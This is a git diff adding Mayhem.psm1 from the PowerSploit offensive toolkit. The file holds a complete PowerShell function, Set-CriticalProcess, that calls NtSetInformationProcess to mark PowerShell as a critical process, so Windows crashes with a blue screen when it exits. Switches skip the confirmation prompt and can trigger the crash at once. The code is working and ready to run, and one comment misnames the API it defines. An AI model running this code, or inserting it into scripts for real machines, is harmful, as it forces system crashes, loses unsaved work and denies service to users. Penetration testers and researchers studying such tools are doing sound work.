1 files changed, 99 insertions, 0 deletions

diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1
new file mode 100644
index 0000000..a8cd424
--- /dev/null
+++ b/Mayhem/Mayhem.psm1
@@ -0,0 +1,99 @@
+function Set-CriticalProcess
+{
+<#
+.SYNOPSIS
+
+Causes your machine to blue screen upon exiting PowerShell.
+
+PowerSploit Function: Set-CriticalProcess
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.PARAMETER ExitImmediately
+
+Immediately exit PowerShell after successfully marking the process as critical.
+
+.PARAMETER Force
+
+Set the running PowerShell process as critical without asking for confirmation.
+
+.EXAMPLE
+
+Set-CriticalProcess
+
+.EXAMPLE
+
+Set-CriticalProcess -ExitImmediately
+
+.EXAMPLE
+
+Set-CriticalProcess -Force -Verbose
+
+#>
+
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+        [Switch]
+        $Force,
+
+        [Switch]
+        $ExitImmediately
+    )
+
+    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
+    {
+        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
+    }
+
+    $Response = $True
+
+    if (!$Force)
+    {
+        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
+    }
+    
+    if (!$Response)
+    {
+        return
+    }
+
+    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
+    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
+
+    # Define [ntdll]::NtQuerySystemInformation method
+    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
+    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
+                                                        'ntdll.dll',
+                                                        ([Reflection.MethodAttributes] 'Public, Static'),
+                                                        [Reflection.CallingConventions]::Standard,
+                                                        [Int32],
+                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
+                                                        [Runtime.InteropServices.CallingConvention]::Winapi,
+                                                        [Runtime.InteropServices.CharSet]::Auto)
+
+    $ntdll = $TypeBuilder.CreateType()
+
+    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
+    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
+
+    $ProcessBreakOnTermination = 29
+    $SizeUInt32 = 4
+
+    try
+    {
+        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
+    }
+    catch
+    {
+        return
+    }
+
+    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
+
+    if ($ExitImmediately)
+    {
+        Stop-Process -Id $PID
+    }
+}
\ No newline at end of file